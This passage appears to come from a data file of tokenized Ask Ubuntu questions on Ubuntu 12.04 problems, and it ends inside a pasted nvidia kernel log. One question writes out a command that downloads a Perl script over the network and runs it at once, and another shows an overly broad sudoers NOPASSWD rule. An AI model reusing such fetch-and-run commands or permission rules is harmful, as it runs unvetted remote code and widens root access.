//qt.nokia.com/ original-maintainer : debian qt/kde maintainers < debian-qt-kde @ lists.debian.org > i have tried dpkg -- configure with no results .
167468	where can i find the source code of ubuntu ?	i would like to know where to find the source code of ubuntu 12.04 . i 'd like to see how far it is `` open source '' .
167469	what is imap+ ? and how is it more advantageous over imap ?	in evolution there is an option for an 'imap+ ' server type . what is imap+ ? i noticed , if i choose imap+ for gmail account , two extra options appear in the receiving option tab : use quick resync if the server supports it use idle if the server supports it what are these ? and what are their advantages ?
167475	evolution 3.4.3 on 12.04 ?	i 'm currently using evolution for my mail client on 12.04 ( and no , i do n't want to use thunderbird ) , but the version available in the repos ( 3.2 ) has a couple of bugs ( more precisely , its version of ews has the bugs ) that are fixed in later versions . is there a ppa available for at least 3.3 ? while i have no issue compiling from source , i 'd rather use a ppa if it 's available , but unfortunately , my own searching did n't turn up anything . edit thanks to jxpheonix for finding a ppa . i added it and found that apt-get upgrade did n't want to just update evolution and had several of the gnome 3.4 packages held back . installing evolution specifically with apt-get install evolution worked great , though . ( since ubuntu was pretty adamant about not updating evolution , i decided to see what i could find as to why , beyond the generic `` stability reasons '' that was given for everything they held back . according to this article , it seems it 's just because 3.4 was n't as well-tested as 3.2 as of precise 's release . ) for those using ews , you will need to update evolution-ews , of course . i found this script useful for building and installing ews . it 's originally written for 3.2 , but a simple change to the script to point to the correct download location ( simply change the `` 3-2 '' in the git repo clone call to `` 3-4 '' ) allows it to install with no problems . after updating ews , my exchange account is back up , complete with the global address book and exchange calendar !
167477	problem connecting with usb 3g viettel in 12.04	when i plug my 3g usb viettel modem to my case , it is not working . i have tried to access the network icon in the top panel , then i set up the connection , removed it and plugged it in again , but still it is not working . my 3g usb is from huawei . please help me .
167478	making a new distro without x but with ubiquity	i need to create my own distro based on ubuntu server and i need it as light as possible ( so there should be no x or any other stuff like that ) . by the way the distro installer must be graphical ( ubiquity of course ) so that i can put my custom configuration forms in it . the problem is that as far as i understood ( i have tried remastersys , customizer and ubuntu-builder ) you can not use x in your installer ( live version ) and not to have it in your final installation , but since i have just seen something similar i am sure that its possible to do so . is there anyone who has relevant experience ?
167480	give group permission to only kill specific process which is started by root	i want the members of a certain group to kill python . pidof python | xargs kill this is no problem when python has been started by themself . but when root has started a python process than the users of the group ca n't kill python . i can fix this to allow the group members to use kill without password . % nohup all= ( root ) nopasswd : /usr/kill but now the group members can kill each process . i only want them to kill python . how can i give permission to a group to kill only a specific proces that has been started by root ?
167491	connecting ms sql using freetds and unixodbc : isql - no default driver specified	i am trying to connect to the ms sql database using freetds and unixodbc . i have read various guides how to do it , but no one works fine for me . when i try to connect to the database using isql tool , i get the following error : $ isql -v ts username password [ im002 ] [ unixodbc ] [ driver manager ] data source name not found , and no default driver specified [ isql ] error : could not sqlconnect have anybody already successfully established the connection to the ms sql database using freetds and unixodbc on ubuntu 12.04 ? i would really appreciate some help . below is the procedure i used to configure the freetds and unixodbc . thanks for your help in advance ! procedure first , i have installed the following packages with : sudo apt-get install unixodbc unixodbc-dev freetds-dev tdsodbc and configured freetds as follows : -- - /etc/freetds/freetds.conf -- - [ ts ] host = server port = 1433 tds version = 7.0 client charset = utf-8 using tsql tool i can successfully connect to the database by executing tsql -s ts -u username -p password as i need an odbc connection i configured odbcinst.ini as follows : -- - /etc/odbcinst.ini -- - [ freetds ] description = freetds driver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so setup = /usr/lib/x86_64-linux-gnu/odbc/libtdss.so fileusage = 1 cptimeout = cpresuse = client charset = utf-8 and odbc.ini as follows : -- - /etc/odbc.ini -- - [ ts ] description = `` test '' driver = freetds servername = server server = server port = 1433 database = dbname trace = no trying to connect to the database using isql tool with such a configuration results the following error : $ isql -v ts username password [ im002 ] [ unixodbc ] [ driver manager ] data source name not found , and no default driver specified [ isql ] error : could not sqlconnect
167492	how to create a local webapp userscript	i 'd like to write my own local webapps userscripts , but i do n't want to compile and install the main webapps source code every time . i would like to keep the original ubuntu webapps package installed , but use my local userscripts as well . is this possible ?
167501	how to configure quickly with java ?	i want to use java instead of python in quickly . is this possible ? i actually do n't know much python and so i have chosen java as my language for making a software .
167505	window creation issue python gtk via quickly	i 'm currently learning python and gtk so please forgive the noobish question , i have a program ( created in quickly ) that has two main windows , that is to say that depending on context one or the other window is displayed , and if a item is clicked in the first window the second window is called . this works well the first time the second window is called , but subsequent times the window appears blank , its requested dimensions are applied so i assume it is reading the glade file correctly . did some part of my program destroy the widgets when i closed the window ? if so is there a simple way to avoid this ? i can post the source code if needed .
167506	how do i set up keyboard shortcuts that use the super key ?	i want the super key to behave as a regular modifier key , just like ctrl , shift and alt . currently , it does n't . using the system settings to set a shortcut like super+up will set the shortcut , but the shortcut will be unusable . pressing super+up instead functions just like pressing a single up . the super modifier is ignored and the shortcut never gets actived . likewise for shortcuts such as super+w ( i.e . it 's like pressing an unmodified single w ) . i 've used compizconfig to unbind all unity-related shortcuts , but super still behaves in this weird , special way . how can i create keyboard shortcuts such as super+w that work ?
167507	desktop search tool with lotus notes integration	hey fellow ubuntu lovers , i switched a while ago from win . to ubuntu and i am loving it ! the only thing i miss is the desktop search integration with lotus notes . i 've been searching the web for quite some while now but without any luck . to bad google stopped because it seemed to be the only on supporting lotus notes in unix based environments . anyone got a hint or a tip ?
167511	why is n't `` useradd '' working to add a user to the primary group ?	the command i use is : sudo useradd -g users tom it should add tom to the group users , but i ca n't find tom in users when checking /etc/group . however , if i just try : sudo useradd -g users jim i find that jim is added to users successfully . anyone has ever come across this problem ?
167518	ca n't boot after kernel upgrade to 3.2.0-27	i 've a new dell inspiron special edition with intelâž coreâ˘ i7-3612qm and ati radeon hd 7730m . i 'm running ubuntu 12.04 in dual boot with windows 7 . yesterday after a kernel upgrade from 3.2.0-26 to 3.2.0-27 , ubuntu does n't boot anymore . i see the grub and when selecting `` ubuntu with linux 3.2.0-27-generic '' , the system switched to a black screen with blinking cursor . no console enabled , at this time i can only shutdown the system with the power button . if i select previous linux version , linux 3.2.0-26 starts without a problem . i 've open /boot/grub/grub.cfg and record of version 27 and 26 have same parameters . is it possible that the problem come from error in 3.2.0-27 kernel 's file ? how can i fix this issue ? is it possible to remove 3.2.0-27 kernel file and reinstall ?
167521	where is the man page for `` pthread_mutex_lock '' ?	i ca n't find the manual for pthread_mutex_lock with man pthread_mutex_lock , is that something wrong with manpages-dev ? i got that package installed , but missing some manual . should i fire a bug to ubuntu ?
167525	is there a startup shell script for jenkins ?	hi i have installed jenkins using sudo apt-get install jenkins now there is a new user called jenkins , and jenkins is started when the computer starts . is there a place i can put a shell script to start other services for this user as well ? i have tried adding .bashrc and .profile to the home directory of the jenkins user ( /var/lib/jenkins ) with no luck .
167528	verizon 3g on samsung xe500c21 with 12.04	i recently upgraded to 12.04 on my chromebook . however , i can not seem to get my 3g connection working . is this a known bug ? does anyone have a solution ? thanks !
167530	why ca n't i run any android ndk commands ?	i had been running mint 12 before , and everything was working there . i switched to ubuntu 12.04 , and now i am very frustrated . when i run ndk-build , i get /home/buzz/ndk/prebuilt/linux-x86/bin/make : not found so , i changed to that folder directly . when i type in ./make , i get bash : ./make : no such file or directory typing ls clearly shows the file where i am ! i did some hacking around ( pointing to external tools ) to get past each error ( just to experiment ) , and i ran into this ! /home/buzz/ndk/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86/bin/arm-linux-androideabi-gcc : command not found why ? why are all these files unable to be found ? as i said above , this was all working just fine in another distro . what changed ? what 's extra frustrating is that if i push tab to auto-complete , it works . so , the file is clearly there ( and clearly marked with execution permissions ) . so , why ca n't it be found ?
167534	how to add programs to the open with menu ?	i had tried to look around an open with tab under a file properties , there are no option to add programs into that list of other applications i just want to set sqlite database browser as my default program for an extension .db update : i found duplicated question in 2011.. there are smarter way on gui based ? so i am looking for something like set default open program - ubuntu 9.04 ( why do ubuntu downgrade itself ? )
167538	how to share wifi internet to lan port ?	i have installed 11.10 ubuntu i have internet in mobile then create hospot for access internet in laptop ... now main thing is that how can i share that to lan ( eth0 ) . path of internet mobile wifi -- > laptop wifi -- > laptop lan -- > smart tv lan
167539	how do i scan my windows partition for viruses from ubuntu ?	i think i might have a virus on my windows partition and i want to scan it from ubuntu . is this possible ? i would like a program that is free . clamav i tried clamav but i could n't find a setting for scaning my other partition that i have windows on , it scaned my ubuntu disk and that was fine . antivirus within windows i ca n't use my windows partition since the virus make my laptop freeze every time i log in . and i do n't want it to spread or make more damage than it might have done already .
167540	ubuntu 12.04 menu and launch bar disappear , os `` crash ''	i recently installed 12.04 64 bit to my new laptop and it is crashing frequently but inconsistently . when this crash occurs , any windows i have in the work space are left intact but are unresponsive . my menu bar and launch bar seemingly disappear and keyboard shortcuts are unresponsive ; however i am still able to interact with my cursor on the screen . i am using a dell inspiron that i recently purchased ; along with this i installed a fresh ocz solid 3 60 gb hard drive and an 8gb ram upgrade . i installed ubuntu via usb . please let me know what further information would be helpful to debugging my system , i do not mind a fresh install but i am just curious about how to solve this problem should it arise again . thanks !
167554	which processor family should i choose when compiling the kernel for an intel i3/i5/i7 family cpu ?	i have intel® core™ i5-2310 cpu @ 2.90ghz × 4 . which processor family should i to use when configuring kernel ?
167558	ca n't restart after shutdown ?	i shut power off before my ubuntu 12.04 had completely loaded and on power up i now get the following messages . udevd [ 146 ] : inotify_add_watch ( 6 , /dev/dm-1 ) failed : no such file or directory mount : mounting /dev on /root.sys failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . then busybox comes up with following prompt ( initramis ) though i have a programming background i have been an enduser for a couple of decades now . can anyone help ?
167561	how to refresh unity launcher icons from python	i have written a program that runs from the unity launcher . in my preferences it would be useful for users to change the default icon of the .desktop launcher . i 've set it up to change the file , but changes do n't take effect until the user logs out and back in ( or unity -- replace ) . is there a simple way to trigger unity to refresh its icons using python ?
167568	hold download in wget till my connection is established	i want to download a file ttytter using wget and run it in the terminal . i can do that by gnome-terminal -- tab -e 'wget http : //www.floodgap.com/software/ttytter/dist2/2.0.02.txt -o /tmp/ttytter.pl & & perl /tmp/ttytter.pl -hold ' but if my connection is not established then how do i make wget to wait till connection established and then download the file .
167570	how does middle click paste work ?	i do n't understand the middle click paste . sometimes i highlight text , middle click in the window where i want it to go and it does what i want . sometimes it does n't . for instance , when i highlight text in firefox , then go and middle click into terminal vim , nothing happens . what is going on ? thank you !
167571	what is the default username and password for ubuntu 12.04 via startup disk creator ?	i just installed ubuntu-12.04-desktop-i386.iso to my 1gb flash drive via startup disk creator on ubuntu 12.04 . then , i tried to boot it on my system . the problem is that it was asking me for username and password . i tried `` ubuntu '' with blank password but it did n't work . the problem has never happened when i installed the same iso file via universal usb installer on windows . note : there 's no option to make passwords in startup disk creator .
167572	how do i get amilo-rfkill support on a non-pae laptop ? ( a.k.a . where to get 3.5 kernels for oneiric )	the driver seems to be in the 3.3 tree , but i just installed 3.3.7 from the mainline kernel repository , cause i thought it would have the driver ( 3.3-rc7 ) . but it is not included . there are no newer kernels for oneiric , and i ca n't use precise or quantal kernels cause they require pae and i do n't have that .
167573	flashplayer and livemocha	prior to the most recent update , i have been able to use livemocha with flashplayer . now flashplayer is unrecognized by livemocha . i get the `` get flash '' message . how do i fix this ?
167587	bio-linux : how to select an os for remote desktop in dual boot environment ?	i have a system dual-booting windows 7 pro and bio-linux ( `` bio-linux provides more than 500 bioinformatics programs on an ubuntu linux 10.04 base '' 10.04 is lts , supported until april 2013 ) . i have grub set to show the list of operating systems at startup and wait for user input to select what os to boot into . i 'd like to run remote desktop on both operating systems . i am very familiar with the windows side but new to ubuntu . do i need a separate ip address for each os or can i use the same one on both ? right now i have two different ip addresses , one assigned to each os , but i 'd be happy to use just one if that is possible . how can i control which os to remote in to if i use the same ip address ? i got remote desktop to respond on the ubuntu side but it seems to only give me the terminal , how can i get to the gui desktop ?
167588	get files off machine in recovery mode	i have a virtualbox vm that is broken . it wo n't boot normally . i do n't want to bother trying to fix it but i do want to get some files off it that i need . if i hold down the shift key i can get to a prompt allowing me to boot into recovery mode and from there i can select the option netroot and i 'm in . i can get to the files on that machine which i need and the internet works ( i can run wget -- spider http : //example.com succesfully . ) so it seems like i should have everything i need to get the files off . but how ? i thought about trying to setup an ftp server but i 'm wondering if there is n't an easier way . i am running ubuntu 12.04 on the host and 10.04lt on the client ( vm ) .
167589	when installing , how can i have multiple mount points on a single partition ?	i want to put /home , /var , /opt and /tmp on /dev/sda2 and /root on /dev/sda1 when installing ubuntu . my pc has an 8gb integrated ssd , and i would like to use it to speed up boot time and application loading , but i want to save everything else onto a single partition . i do not want to put /home , /var , /opt and /tmp on separate partitions . is this feasible ? how do i go about accomplishing this ? something with symlinks ?
167590	how to write all zero 's ( zero out ) a usb stick ?	i was trying to zero my usb from the option disk utility but could not happened . help me out to solve this problem .
167597	flash player plug-in could not be added to firefox or opera plug-ins !	i use ubuntu 11.10 and firefox and opera browsers . every time i install flash player plug-in ( the original of adobe or the installer mode ) , no plug-in adds to firefox or opera . why ? ! i tried gnash and lightspark ( ? ) too . but the problem was existing yet . what should i do ?
167603	how do i install the firmware on ubuntu 12.04	i have a dell latitude d610 and whenever i try to connect to wifi , it says missing firmware . when i open my additional drives icon , nothing is there . i have rebooted many times . what should i do to solve this problem ?
167604	nvidia driver problems and latest ubuntu 12.04 3.2.0-27-generic kernel	had no problems before and was running nvidia driver version 295.59 . now when ubuntu updated from kernel 3.2.0-26-generic to 3.2.0-27-generic and i reinstalled the nvidia driver version 295.59 i had tons of performance issues . there were stutters , momentary hangs and when i checked my xorg logs i found that it was nvidia and i have posted the logs separately . so i proceeded to update to the newer nvidia driver 302.07 which is in beta but the performance issues went away and i approached normal operation . however , google-chrome had a massive hang that froze the entire screen . nothing in the xorg log reported anything out of the ordinary but the kernel log did , attached . the problem also affects my screen saver , i had to disable it because the system went to blank screen and could not load the xscreensaver lock out login screen and the whole system went into a kernel panic ... my tty 's the ctrl-alt-f1 things are blank too ... here are my xorg logs : backtrace : [ 1726.560 ] 0 : /usr/bin/x ( xorg_backtrace+0x37 ) [ 0x3a9607 ] [ 1726.560 ] 1 : /usr/bin/x ( mieqenqueue+0xf8 ) [ 0x387828 ] [ 1726.560 ] 2 : /usr/bin/x ( 0x221000+0x4ccd5 ) [ 0x26dcd5 ] [ 1726.560 ] 3 : /usr/bin/x ( xf86postmotioneventm+0xf9 ) [ 0x2aed79 ] [ 1726.560 ] 4 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0xc47000+0x3c3d ) [ 0xc4ac3d ] [ 1726.560 ] 5 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0xc47000+0x524f ) [ 0xc4c24f ] [ 1726.560 ] 6 : /usr/bin/x ( 0x221000+0x78361 ) [ 0x299361 ] [ 1726.560 ] 7 : /usr/bin/x ( 0x221000+0x9fcc8 ) [ 0x2c0cc8 ] [ 1726.561 ] 8 : ( vdso ) ( __kernel_sigreturn+0x0 ) [ 0x9bb400 ] [ 1726.561 ] 9 : /usr/lib/xorg/modules/drivers/nvidia_drv.so ( 0x1fb8e000+0xd74cd ) [ 0x1fc654cd ] [ 1726.956 ] [ mi ] increasing eq size to 512 to prevent dropped events . [ 1726.956 ] [ mi ] eq processing has resumed after 371 dropped events . [ 1726.956 ] [ mi ] this may be caused my a misbehaving driver monopolizing the server 's resources . [ 1800.328 ] [ mi ] eq overflowing . additional events will be discarded until existing events are processed . [ 1800.328 ] backtrace : [ 1800.328 ] 0 : /usr/bin/x ( xorg_backtrace+0x37 ) [ 0x3a9607 ] [ 1800.328 ] 1 : /usr/bin/x ( mieqenqueue+0x223 ) [ 0x387953 ] [ 1800.328 ] 2 : /usr/bin/x ( 0x221000+0x4ccd5 ) [ 0x26dcd5 ] [ 1800.328 ] 3 : /usr/bin/x ( xf86postmotioneventm+0xf9 ) [ 0x2aed79 ] [ 1800.328 ] 4 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0xc47000+0x3c3d ) [ 0xc4ac3d ] [ 1800.328 ] 5 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0xc47000+0x524f ) [ 0xc4c24f ] [ 1800.328 ] 6 : /usr/bin/x ( 0x221000+0x78361 ) [ 0x299361 ] [ 1800.329 ] 7 : /usr/bin/x ( 0x221000+0x9fcc8 ) [ 0x2c0cc8 ] [ 1800.329 ] 8 : ( vdso ) ( __kernel_sigreturn+0x0 ) [ 0x9bb400 ] [ 1800.329 ] 9 : /usr/lib/xorg/modules/drivers/nvidia_drv.so ( 0x1fb8e000+0xd74cd ) [ 0x1fc654cd ] [ 1800.329 ] [ mi ] these backtraces from mieqenqueue may point to a culprit higher up the stack . [ 1800.329 ] [ mi ] mieq is not the cause . it is a victim . [ 1800.438 ] [ mi ] increasing eq size to 1024 to prevent dropped events . [ 1800.439 ] [ mi ] eq processing has resumed after 25 dropped events . [ 1800.439 ] [ mi ] this may be caused my a misbehaving driver monopolizing the server 's resources . here is my kernel log : jul 24 12:48:13 computer kernel : [ 4015.086546 ] bug : soft lockup - cpu # 1 stuck for 23s ! [ chrome:2120 ] jul 24 12:48:13 computer kernel : [ 4015.086551 ] modules linked in : michael_mic arc4 pci_stub vboxpci ( o ) vboxnetadp ( o ) vboxnetflt ( o ) vboxdrv ( o ) parport_pc rfcomm ppdev bnep bluetooth nvidia ( p ) binfmt_misc snd_hda_codec_idt joydev snd_hda_intel snd_hda_codec snd_hwdep snd_pcm b44 ssb lib80211_crypt_tkip snd_seq_midi wl ( p ) r852 sm_common nand nand_ids coretemp snd_rawmidi snd_seq_midi_event psmouse lp serio_raw mtd nand_bch dell_laptop dcdbas r592 bch dell_wmi sparse_keymap memstick nand_ecc snd_seq video snd_timer snd_seq_device lib80211 parport mac_hid snd wmi soundcore snd_page_alloc firewire_ohci firewire_core crc_itu_t sdhci_pci sdhci usbhid hid uvesafb jul 24 12:48:13 computer kernel : [ 4015.086615 ] modules linked in : michael_mic arc4 pci_stub vboxpci ( o ) vboxnetadp ( o ) vboxnetflt ( o ) vboxdrv ( o ) parport_pc rfcomm ppdev bnep bluetooth nvidia ( p ) binfmt_misc snd_hda_codec_idt joydev snd_hda_intel snd_hda_codec snd_hwdep snd_pcm b44 ssb lib80211_crypt_tkip snd_seq_midi wl ( p ) r852 sm_common nand nand_ids coretemp snd_rawmidi snd_seq_midi_event psmouse lp serio_raw mtd nand_bch dell_laptop dcdbas r592 bch dell_wmi sparse_keymap memstick nand_ecc snd_seq video snd_timer snd_seq_device lib80211 parport mac_hid snd wmi soundcore snd_page_alloc firewire_ohci firewire_core crc_itu_t sdhci_pci sdhci usbhid hid uvesafb jul 24 12:48:13 computer kernel : [ 4015.086669 ] jul 24 12:48:13 computer kernel : [ 4015.086673 ] pid : 2120 , comm : chrome tainted : p o 3.2.0-27-generic # 43-ubuntu dell inc. vostro 1500 /0wy040 jul 24 12:48:13 computer kernel : [ 4015.086680 ] eip : 0060 : [ ] eflags : 00200286 cpu : 1 jul 24 12:48:13 computer kernel : [ 4015.086792 ] eip is at rm_check_pci_config_space+0x118/0xa77 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.086795 ] eax : 086700a2 ebx : f8b07004 ecx : 0000001b edx : 00000000 jul 24 12:48:13 computer kernel : [ 4015.086797 ] esi : ebcce004 edi : ec120c00 ebp : ebcce000 esp : f30edecc jul 24 12:48:13 computer kernel : [ 4015.086800 ] ds : 007b es : 007b fs : 00d8 gs : 00e0 ss : 0068 jul 24 12:48:13 computer kernel : [ 4015.086804 ] process chrome ( pid : 2120 , ti=f30ec000 task=eae91940 task.ti=eae9c000 ) jul 24 12:48:13 computer kernel : [ 4015.086806 ] stack : jul 24 12:48:13 computer kernel : [ 4015.086808 ] ebcce004 0000543b f30edeec f30b8000 00200292 ec08e800 ec0c0800 ffffffff jul 24 12:48:13 computer kernel : [ 4015.086816 ] f30edef8 f31e3000 f30edf34 ec0c0800 f9878074 ec0c0e08 00000000 f9857f4e jul 24 12:48:13 computer kernel : [ 4015.086824 ] ec120c00 ec120f88 f30edfa0 fa0424f4 ebccc000 ec120c00 00000001 00000001 jul 24 12:48:13 computer kernel : [ 4015.086831 ] call trace : jul 24 12:48:13 computer kernel : [ 4015.086861 ] [ ] ? wlc_bmac_led_blink_event+0x61/0x68 [ wl ] jul 24 12:48:13 computer kernel : [ 4015.086885 ] [ ] ? wlc_led_event+0xaa/0x718 [ wl ] jul 24 12:48:13 computer kernel : [ 4015.086980 ] [ ] ? nv_kern_rc_timer+0x44/0x90 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.086988 ] [ ] ? call_timer_fn+0x2f/0x110 jul 24 12:48:13 computer kernel : [ 4015.086993 ] [ ] ? force_qs_rnp+0xfd/0x140 jul 24 12:48:13 computer kernel : [ 4015.087086 ] [ ] ? nv_kern_suspend+0x120/0x120 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.087090 ] [ ] ? run_timer_softirq+0xeb/0x210 jul 24 12:48:13 computer kernel : [ 4015.087094 ] [ ] ? rcu_check_quiescent_state+0x23/0xa0 jul 24 12:48:13 computer kernel : [ 4015.087188 ] [ ] ? nv_kern_suspend+0x120/0x120 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.087192 ] [ ] ? __rcu_process_callbacks+0x37/0xf0 jul 24 12:48:13 computer kernel : [ 4015.087196 ] [ ] ? local_bh_enable_ip+0x90/0x90 jul 24 12:48:13 computer kernel : [ 4015.087200 ] [ ] ? __do_softirq+0x81/0x1a0 jul 24 12:48:13 computer kernel : [ 4015.087203 ] [ ] ? local_bh_enable_ip+0x90/0x90 jul 24 12:48:13 computer kernel : [ 4015.087205 ] jul 24 12:48:13 computer kernel : [ 4015.087209 ] [ ] ? irq_exit+0x76/0xa0 jul 24 12:48:13 computer kernel : [ 4015.087214 ] [ ] ? smp_apic_timer_interrupt+0x59/0x88 jul 24 12:48:13 computer kernel : [ 4015.087219 ] [ ] ? pci_conf1_read+0xb5/0x110 jul 24 12:48:13 computer kernel : [ 4015.087223 ] [ ] ? apic_timer_interrupt+0x31/0x38 jul 24 12:48:13 computer kernel : [ 4015.087228 ] [ ] ? dmar_disable_qi+0x180/0x190 jul 24 12:48:13 computer kernel : [ 4015.087232 ] [ ] ? _raw_spin_unlock_irqrestore+0x15/0x20 jul 24 12:48:13 computer kernel : [ 4015.087238 ] [ ] ? pci_bus_read_config_dword+0x7b/0x90 jul 24 12:48:13 computer kernel : [ 4015.087332 ] [ ] ? os_pci_read_dword+0x30/0x40 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.087431 ] [ ] ? rm_check_pci_config_space+0x38c/0xa77 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.087435 ] [ ] ? smp_apic_timer_interrupt+0x59/0x88 jul 24 12:48:13 computer kernel : [ 4015.087439 ] [ ] ? rcu_irq_exit+0xd/0x10 jul 24 12:48:13 computer kernel : [ 4015.087534 ] [ ] ? nv_verify_pci_config+0x70/0xa0 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.087631 ] [ ] ? _nv014598rm+0x1b/0x1f [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.087727 ] [ ] ? _nv014641rm+0x27/0x499 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.087899 ] [ ] ? _nv009259rm+0xa17/0xa38 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.088007 ] [ ] ? _nv001251rm+0xa3/0xb5 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.088114 ] [ ] ? _nv002008rm+0x1a9/0x1b9 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.088268 ] [ ] ? _nv005842rm+0x7bc/0x7eb [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.088422 ] [ ] ? _nv005818rm+0x7f/0xa3 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.088576 ] [ ] ? _nv005954rm+0x71/0x9c [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.088671 ] [ ] ? _nv001064rm+0x19f8/0x2860 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.088766 ] [ ] ? _nv001030rm+0xb26/0xb59 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.088861 ] [ ] ? _nv001064rm+0x4a/0x2860 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.088955 ] [ ] ? _nv000938rm+0x1f/0x10b [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.089054 ] [ ] ? _nv001096rm+0x250/0x614 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.089149 ] [ ] ? rm_ioctl+0x71/0xd9 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.089155 ] [ ] ? _copy_from_user+0x42/0x60 jul 24 12:48:13 computer kernel : [ 4015.089250 ] [ ] ? nv_kern_ioctl+0x151/0x450 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.089255 ] [ ] ? remove_vma+0x44/0x60 jul 24 12:48:13 computer kernel : [ 4015.089259 ] [ ] ? remove_vma+0x44/0x60 jul 24 12:48:13 computer kernel : [ 4015.089352 ] [ ] ? nv_kern_ioctl+0x450/0x450 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.089445 ] [ ] ? nv_kern_unlocked_ioctl+0x20/0x30 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.089449 ] [ ] ? do_vfs_ioctl+0x79/0x2d0 jul 24 12:48:13 computer kernel : [ 4015.089453 ] [ ] ? sys_ioctl+0x6f/0x80 jul 24 12:48:13 computer kernel : [ 4015.089457 ] [ ] ? syscall_call+0x7/0xb jul 24 12:48:13 computer kernel : [ 4015.089461 ] [ ] ? verify_pmtmr_rate+0x79/0x95 jul 24 12:48:13 computer kernel : [ 4015.089464 ] code : 00 00 ba 00 00 00 00 85 c0 74 2a f6 47 08 10 74 24 83 bf d0 00 00 00 00 74 1b 8b 87 d0 00 00 00 83 78 20 00 74 0f 8b 40 20 8b 00 < 3b > 43 28 75 05 ba 01 00 00 00 85 d2 75 55 c7 44 24 04 04 00 00 jul 24 12:48:13 computer kernel : [ 4015.089517 ] call trace : jul 24 12:48:13 computer kernel : [ 4015.089546 ] [ ] ? wlc_bmac_led_blink_event+0x61/0x68 [ wl ] jul 24 12:48:13 computer kernel : [ 4015.089570 ] [ ] ? wlc_led_event+0xaa/0x718 [ wl ] jul 24 12:48:13 computer kernel : [ 4015.089664 ] [ ] ? nv_kern_rc_timer+0x44/0x90 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.089670 ] [ ] ? call_timer_fn+0x2f/0x110 jul 24 12:48:13 computer kernel : [ 4015.089675 ] [ ] ? force_qs_rnp+0xfd/0x140 jul 24 12:48:13 computer kernel : [ 4015.089768 ] [ ] ? nv_kern_suspend+0x120/0x120 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.089773 ] [ ] ? run_timer_softirq+0xeb/0x210 jul 24 12:48:13 computer kernel : [ 4015.089778 ] [ ] ? rcu_check_quiescent_state+0x23/0xa0 jul 24 12:48:13 computer kernel : [ 4015.089872 ] [ ] ? nv_kern_suspend+0x120/0x120 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.089876 ] [ ] ? __rcu_process_callbacks+0x37/0xf0 jul 24 12:48:13 computer kernel : [ 4015.089881 ] [ ] ? local_bh_enable_ip+0x90/0x90 jul 24 12:48:13 computer kernel : [ 4015.089885 ] [ ] ? __do_softirq+0x81/0x1a0 jul 24 12:48:13 computer kernel : [ 4015.089889 ] [ ] ? local_bh_enable_ip+0x90/0x90 jul 24 12:48:13 computer kernel : [ 4015.089891 ] [ ] ? irq_exit+0x76/0xa0 jul 24 12:48:13 computer kernel : [ 4015.089898 ] [ ] ? smp_apic_timer_interrupt+0x59/0x88 jul 24 12:48:13 computer kernel : [ 4015.089904 ] [ ] ? pci_conf1_read+0xb5/0x110 jul 24 12:48:13 computer kernel : [ 4015.089908 ] [ ] ? apic_timer_interrupt+0x31/0x38 jul 24 12:48:13 computer kernel : [ 4015.089914 ] [ ] ? dmar_disable_qi+0x180/0x190 jul 24 12:48:13 computer kernel : [ 4015.089918 ] [ ] ? _raw_spin_unlock_irqrestore+0x15/0x20 jul 24 12:48:13 computer kernel : [ 4015.089924 ] [ ] ? pci_bus_read_config_dword+0x7b/0x90 jul 24 12:48:13 computer kernel : [ 4015.090019 ] [ ] ? os_pci_read_dword+0x30/0x40 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090124 ] [ ] ? rm_check_pci_config_space+0x38c/0xa77 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090129 ] [ ] ? smp_apic_timer_interrupt+0x59/0x88 jul 24 12:48:13 computer kernel : [ 4015.090133 ] [ ] ? rcu_irq_exit+0xd/0x10 jul 24 12:48:13 computer kernel : [ 4015.090229 ] [ ] ? nv_verify_pci_config+0x70/0xa0 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090326 ] [ ] ? _nv014598rm+0x1b/0x1f [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090423 ] [ ] ? _nv014641rm+0x27/0x499 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv009259rm+0xa17/0xa38 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv001251rm+0xa3/0xb5 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv002008rm+0x1a9/0x1b9 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv005842rm+0x7bc/0x7eb [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv005818rm+0x7f/0xa3 [ 